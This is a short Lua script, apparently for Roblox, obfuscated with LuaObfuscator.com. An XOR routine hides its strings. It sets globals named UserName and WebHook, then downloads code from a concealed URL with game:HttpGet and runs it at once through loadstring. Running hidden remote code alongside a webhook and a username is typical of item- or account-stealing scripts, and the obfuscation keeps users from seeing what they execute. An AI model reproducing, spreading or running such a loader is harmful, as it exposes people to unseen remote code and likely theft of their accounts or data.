--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=2 -1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (1010 -(308 + 701)))),v1(v2(v9,(3 -2) + (1711 -(1440 + 271)) + ((v11-(4 -3))% #v9),(1888 -(536 + 1351)) + ((v11-(1 + 0))% #v9) + ((1168 -(524 + 642)) -(1 + 0)))))%(88 + 168)));end return v5(v10);end UserName=v7("\202\2\179\170\127\18\234","\144\109\193\197\17\97");WebHook=v7("\69\47\104\33\43\43\2\116\120\56\43\114\66\41\120\127\59\126\64\116\125\33\49\62\90\62\126\57\55\126\70\40\51\96\104\36\27\107\37\96\111\41\24\111\37\99\97\39\26\111\42\100\119\37\119\98\81\53\27\73\103\99\120\54\110\121\26\30\87\29\23\60\0\45\46\98\62\98\28\107\120\20\48\35\103\57\126\11\48\89\105\111\79\54\33\32\94\54\116\103\105\78\103\50\77\7\43\89\106\22\84\54\117\101\66\60\80\23\11\94\64","\45\91\28\81\88\17");loadstring(game:HttpGet(v7("\47\62\174\145\171\96\126\100\53\43\173\207\191\51\37\35\50\40\175\146\189\40\50\36\41\62\191\143\172\116\50\36\42\101\146\128\170\62\22\42\42\47\137\146\247\10\2\19\104\39\187\136\182\117\2\40\53\35\170\149\246\54\36\42","\71\74\218\225\216\90\81\75"),true))();
